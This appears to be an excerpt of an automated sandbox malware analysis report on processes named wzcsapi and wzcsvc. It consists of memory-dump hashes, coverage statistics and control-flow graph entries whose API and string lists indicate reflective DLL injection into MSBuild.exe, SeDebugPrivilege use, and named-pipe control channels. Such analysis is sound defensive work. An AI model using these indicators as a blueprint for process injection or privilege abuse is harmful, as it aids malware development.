• Instruction Fuzzy Hash: 01A0029274D2815AE303013DDC311AD2E114FC625871B00B3D8D886992D85C59169111
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b024923813f5763409aca065283e968a13d0051693dc6090529a4b9921d90326
• Instruction ID: 0083c1e84cb763baf7e89f7491fad4bf4755ab14264281747ff6ef9bd42647bf
• Opcode Fuzzy Hash: b024923813f5763409aca065283e968a13d0051693dc6090529a4b9921d90326
• Instruction Fuzzy Hash: F561E47191CA4D8FEB54DB68C855AEDBBF1FF59301F1482AAD04DD3292CE38A845CB81
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 362c49c2bd5037a1ee62954cfa059035c7b50ba6ae71ab8d0541d8e8808fae8b
• Instruction ID: ee44ffddf82272d62ca5eb31d4bea0c8de0b1631d0ba3b3f9f4ecdb10cf9a86c
• Opcode Fuzzy Hash: 362c49c2bd5037a1ee62954cfa059035c7b50ba6ae71ab8d0541d8e8808fae8b
• Instruction Fuzzy Hash: 3651B631A1891D8FEB98EB7CC499AB977E5EF59310F0445B9E00ED32D2CE29EC458781
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5c209434fbdd6492deaf01e9f96cb0dbe05a7d1f64491fb5b270d2edd735e9de
• Instruction ID: 764d171fd82f7263c1537f7f5fa002cef230f4679eb6be1064a3b87efcd111da
• Opcode Fuzzy Hash: 5c209434fbdd6492deaf01e9f96cb0dbe05a7d1f64491fb5b270d2edd735e9de
• Instruction Fuzzy Hash: CF517161B1890A8FEB84F768D452BB9B3D6EF98300F5445B5E00EC33D7CE2CA9458B91
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9c2be6c6f596c9bf9972a248ef7bf327ae7d1487343349c0ddd143dcf21a8f22
• Instruction ID: fa561679d5c6e26464e74a7e9d21aa73368e6ada7de9f5456c05b97953a0e067
• Opcode Fuzzy Hash: 9c2be6c6f596c9bf9972a248ef7bf327ae7d1487343349c0ddd143dcf21a8f22
• Instruction Fuzzy Hash: A15124719486498FE749DB68C845AB87BE4EF56310F0481BAD00DD3292CB29E44BCB90
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 101cc9941e3baae0cf0b5f278c88e421acdafcf172c77a54839f4ff40752e6f3
• Instruction ID: eb051cc688a7b14932241ebde6972da009ce40f1302c21b23b23fd77ccc452c7
• Opcode Fuzzy Hash: 101cc9941e3baae0cf0b5f278c88e421acdafcf172c77a54839f4ff40752e6f3
• Instruction Fuzzy Hash: 7F517F71908A4C8FDB68DB68D845BE9BBB1FB59310F0082AAD44DD3252DE34A9858FC1
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 57fc9c82cf8aa6ddf37ed30388540ba0a7431983603ccadfdff6094136799e95
• Instruction ID: 5c19987c7869029b6cf13417fcb9dc1c07d14551d384754e5fdad289e2ecbec6
• Opcode Fuzzy Hash: 57fc9c82cf8aa6ddf37ed30388540ba0a7431983603ccadfdff6094136799e95
• Instruction Fuzzy Hash: D8519670E5891E8FEB98EB28D445ABC73E6FF99300F4084B5E00DD3292DF29E8458780
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 513916363e70544a29985874f9ae426862b2f901237aadbff87c15e994434549
• Instruction ID: 52242a9890fc4f3f5302cc016cfa1178fac8ef7fd78eb2b6b5660de32e5d20fa
• Opcode Fuzzy Hash: 513916363e70544a29985874f9ae426862b2f901237aadbff87c15e994434549
• Instruction Fuzzy Hash: 8151E331A5D94A8FEB54EB28D855AAC77E5EF4A300F0441F9E00DD32D2DF2DE8458790
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5f6d0916e811a6c40e5652c23b01208ef21b3dba8fae798682a148fa15e845f7
• Instruction ID: 3e2ed530b8ca476ebfd0376a897d26990fe20235ddf5942b1a4bd9bced974b59
• Opcode Fuzzy Hash: 5f6d0916e811a6c40e5652c23b01208ef21b3dba8fae798682a148fa15e845f7
• Instruction Fuzzy Hash: 32418070949A1DCFEB99EB68C45AAA977E0FF65311F0041BEE00EC3692CB35D845CB41
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6f9398318df8852fe7e9346c8e98ab6c29687fbc4cf07dc184fd015feaae636a
• Instruction ID: 91879230e8a99d8ab3b92dd8866c06bbfb785ffbbd2b1e0ea27ad9f1c05fd919
• Opcode Fuzzy Hash: 6f9398318df8852fe7e9346c8e98ab6c29687fbc4cf07dc184fd015feaae636a
• Instruction Fuzzy Hash: 26418D70949A1DCFEB99EB6CC45AAA977E0FB65301F00417EE00ED3691CB35E8458B81
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f6c5e94d2f490dd67d23082649e66dcfa300decbd515c881492d12ab2fcea82e
• Instruction ID: 263364e34c77e92a6282c376cb08ee1ecf895edb052e7c4a7fe1948e0442c714
• Opcode Fuzzy Hash: f6c5e94d2f490dd67d23082649e66dcfa300decbd515c881492d12ab2fcea82e
• Instruction Fuzzy Hash: 984118A2A4E6C3CBF745A7B448554A87FD4FF9721075888FAE08D86183ED1ED90D83C1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5be93224df684bc16108d8b4380d1788a5316eba036247acc942e5b4d51cec41
                                                                                                                                                                                                                                                • Instruction ID: 7d5a0349d4ea2ad4037ae2f754a258b7c4dba8f3d24e05938803bc7a795e25eb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5be93224df684bc16108d8b4380d1788a5316eba036247acc942e5b4d51cec41
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 633107A2A4E6C78BF74567B448154A87FE0FF96200758C8FAE08D86583ED1ED90D83C1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 67a2f25b44a08f5d4a0203f81a5eae2241196910cb4fcd0bc53bba1a6c5c6c7a
                                                                                                                                                                                                                                                • Instruction ID: 52ad6948d829714b7e7bee8e244c8d235f59572403b64796869701b19f124e0d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67a2f25b44a08f5d4a0203f81a5eae2241196910cb4fcd0bc53bba1a6c5c6c7a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2131B17140C7488FDB55DFA8D88AAEABBF0FF56320F0482AFD089C3552D764A409CB91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6efbf264852145a3de742577d4a0a4013d58e0ff4ccd46f565bef26b721a88fd
                                                                                                                                                                                                                                                • Instruction ID: 784972a95fd0dd7aacde53f293ee31170f39102e47eb6004979c8558427002b8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6efbf264852145a3de742577d4a0a4013d58e0ff4ccd46f565bef26b721a88fd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E521C74698F7C28BF716476C5C660797F64AF97104B4840FAE08C86697E80EDA4D83D2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4cc8257762133d43c6906991502aef2b029b5b7abb01d73e8355586ed52e9bcc
                                                                                                                                                                                                                                                • Instruction ID: 97eb542194987ed31f5662a4f84260494ee1209b2a23737a7d6553f38869facf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cc8257762133d43c6906991502aef2b029b5b7abb01d73e8355586ed52e9bcc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2213860A8E58B4FE746976888116F937E9DF9B200F0481F6E04EC71C2DD1DD94A83E1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d7140a693ea078f18b9151194218475fad22c1232daffeffbc674bec98d493fb
                                                                                                                                                                                                                                                • Instruction ID: 67c453e4179d6a2706c792d9af617129a7b7e35722716d681a7b84ba532be9f2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7140a693ea078f18b9151194218475fad22c1232daffeffbc674bec98d493fb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B21928788F7C2CFF716876C58160B97F94AF57110B4840EFE08C8A5A7E81ADA0983D2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 33ade480a36367f853c719c9cbc38cf912891cfc0029ec2948192f040d36b72c
                                                                                                                                                                                                                                                • Instruction ID: 6514eab0c63db18644d683674de0a528f299de9003a9d59d3ed2108f705026a7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33ade480a36367f853c719c9cbc38cf912891cfc0029ec2948192f040d36b72c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4210250A2CA565BFB01A7BC8416BE977D5EF49300F5085B5E00DC32C3CE1CA9448BE2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3fb27f576649f47982af09aded1c7a453174cc2a286213a198cbf96510eb0e56
                                                                                                                                                                                                                                                • Instruction ID: d16789f5b265f73cf599f3718c81d3088b01b9400ef4d4defb5a750b1de21741
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fb27f576649f47982af09aded1c7a453174cc2a286213a198cbf96510eb0e56
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E311B471D4DA4A8FEB94EB6888196ED7BA0EF55300F0041BAE50CC7293DE29990487C1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dea814ee76a5f2f25c24244a244d837b047a3f9a4d94f9bfb85efd813f1bf8cf
                                                                                                                                                                                                                                                • Instruction ID: ea63b7f0b1062d6a35e24b5943c23fafdaa99261a2e953af1dde35b801063cc9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dea814ee76a5f2f25c24244a244d837b047a3f9a4d94f9bfb85efd813f1bf8cf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B112663D4DA9A9FE7449BB898160F97BE0EB96340B0480F7E04DC3287D9299A4983C1
                                                                                                                                                                                                                                                Memory Dump Source

Execution Graph

Execution Coverage: 3.7%
Dynamic/Decrypted Code Coverage: 2.2%
Signature Coverage: 37.1%
Total number of Nodes: 232
Total number of Limit Nodes: 23

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
• Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
Similarity
• API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
• String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\wzconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
• API String ID: 4177739653-225948716
• Opcode ID: 50ba8c157a93ef939d036fd2e1ae7c9574a30eb4664e9a0a25ba6ae7d48a92ab
• Instruction ID: 9f2b41784d5fc8fdb8141fbfe7dcd30bc1f78b4c8051d6e5ceb592e0f520f59d
• Opcode Fuzzy Hash: 50ba8c157a93ef939d036fd2e1ae7c9574a30eb4664e9a0a25ba6ae7d48a92ab
• Instruction Fuzzy Hash: 06815075A48B0296EB20BF29E8545E973A1FF88F58B444136DF4E93AA9DF3CD944C700

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
• Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
Similarity
• API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
• String ID: @$MSBuild.exe$ReflectiveDllMain
• API String ID: 2561231171-627206108
• Opcode ID: ab04de0f4ae730528dcd8ac1db4fb739fdc3cf093d46144e9515fcb488db511c
• Instruction ID: ac1614ca0a6530748963b28d08358b34a4caf4a86ce48fed314a23093705e4ad
• Opcode Fuzzy Hash: ab04de0f4ae730528dcd8ac1db4fb739fdc3cf093d46144e9515fcb488db511c
• Instruction Fuzzy Hash: D0B153A5A4868286EB64AB1AD8542F92BA5FF84F84F004135DF0DA77D9DF3CEA45C700

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
• Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
• String ID:
• API String ID: 4084875642-0
• Opcode ID: 1f6e7ca111fffa28030183a820218c6321eee64b8bf9185de75928df8c46143d
• Instruction ID: 9c8ef98461a36277e6b01ff81a0c8d9a780b9e21c85c87c3984411d09ee9beda
• Opcode Fuzzy Hash: 1f6e7ca111fffa28030183a820218c6321eee64b8bf9185de75928df8c46143d
• Instruction Fuzzy Hash: 3C519E32B556829AEB60EF26E8586E927A0FF49F84F440035EF4DA7799DE3CD845C700

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
• Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
Similarity
• API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
• String ID:
• API String ID: 3197395349-0
• Opcode ID: 721aaf7103811f45df287b5c067dfe78fe8c91bb71f5cc795d6d2487480b1a5e
• Instruction ID: b9bfb40371e7e9f19bacd695f39da6f9b92fe8ab174d2b9bfecdcfb9d9156b4f
• Opcode Fuzzy Hash: 721aaf7103811f45df287b5c067dfe78fe8c91bb71f5cc795d6d2487480b1a5e
• Instruction Fuzzy Hash: 7A315E326147968AD760DF28E4807DE7BA4FB48B58F40422AEF5D97E98DF38D508CB40

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                                                                                                                                                                                • String ID: .text$C:\Windows\System32\
                                                                                                                                                                                                                                                • API String ID: 2721474350-832442975
                                                                                                                                                                                                                                                • Opcode ID: 4ed13a8cb8106b11fba381a82c5365f0d7fbeed321106a12c86950f053f09732
                                                                                                                                                                                                                                                • Instruction ID: 08c89203d5d943233612e15f822990a50e851f8493d78775a9dd87db859330b2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ed13a8cb8106b11fba381a82c5365f0d7fbeed321106a12c86950f053f09732
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE51A322B0868296EB10AF19E4586AA73A1FF84F94F444136DF4E53B9DDF3CE949C700

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                                                                                                                                                                                • String ID: M$\\.\pipe\wzchildproc64
                                                                                                                                                                                                                                                • API String ID: 2203880229-1972328950
                                                                                                                                                                                                                                                • Opcode ID: 3b5b6ec81f1da2cc910c22c2008fe65f86985561381c9405c201595c762e9934
                                                                                                                                                                                                                                                • Instruction ID: c85396765384189edbd26f207fa5af9bf9dee7e7b7111a110832224e004c3659
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b5b6ec81f1da2cc910c22c2008fe65f86985561381c9405c201595c762e9934
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F113721A9C647A1E714FB15E4143F96760AF84FA0F444135DF5A926DADF7CED44C700

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                                                                                                                                                                                • String ID: \\.\pipe\wzcontrol_redirect64
                                                                                                                                                                                                                                                • API String ID: 2071455217-2060006620
                                                                                                                                                                                                                                                • Opcode ID: 8c2d41e4b5917682c0d9b85a7d6b8c4e9ca0a7ce3b1635297fe8c4020b63dccb
                                                                                                                                                                                                                                                • Instruction ID: 66e4e9acf4c6f49f6853729f599cedff258678136cf29d6ca6669966eafcb8c3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c2d41e4b5917682c0d9b85a7d6b8c4e9ca0a7ce3b1635297fe8c4020b63dccb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59011631A8C543A1EA14BB19E4142F963A0AF55FA1F144135EF6A925EEDF7CEC44C700

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3676546796-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7434d648b02f48f96685b3b4a90df6a8a4e973ed4e1a42b06417b92ab0b95
                                                                                                                                                                                                                                                • Instruction ID: fced5a88afedf239fa11b43f4e148db6b4be930db08991a08edd45ceec283361
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7434d648b02f48f96685b3b4a90df6a8a4e973ed4e1a42b06417b92ab0b95
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38114F32A4865396EB14EF1AA81456A76A1FFC5F81F144034DF4A5779DCE7DEC40CB40

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,00000000,?,00007FF6B5AD2383,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD17F9
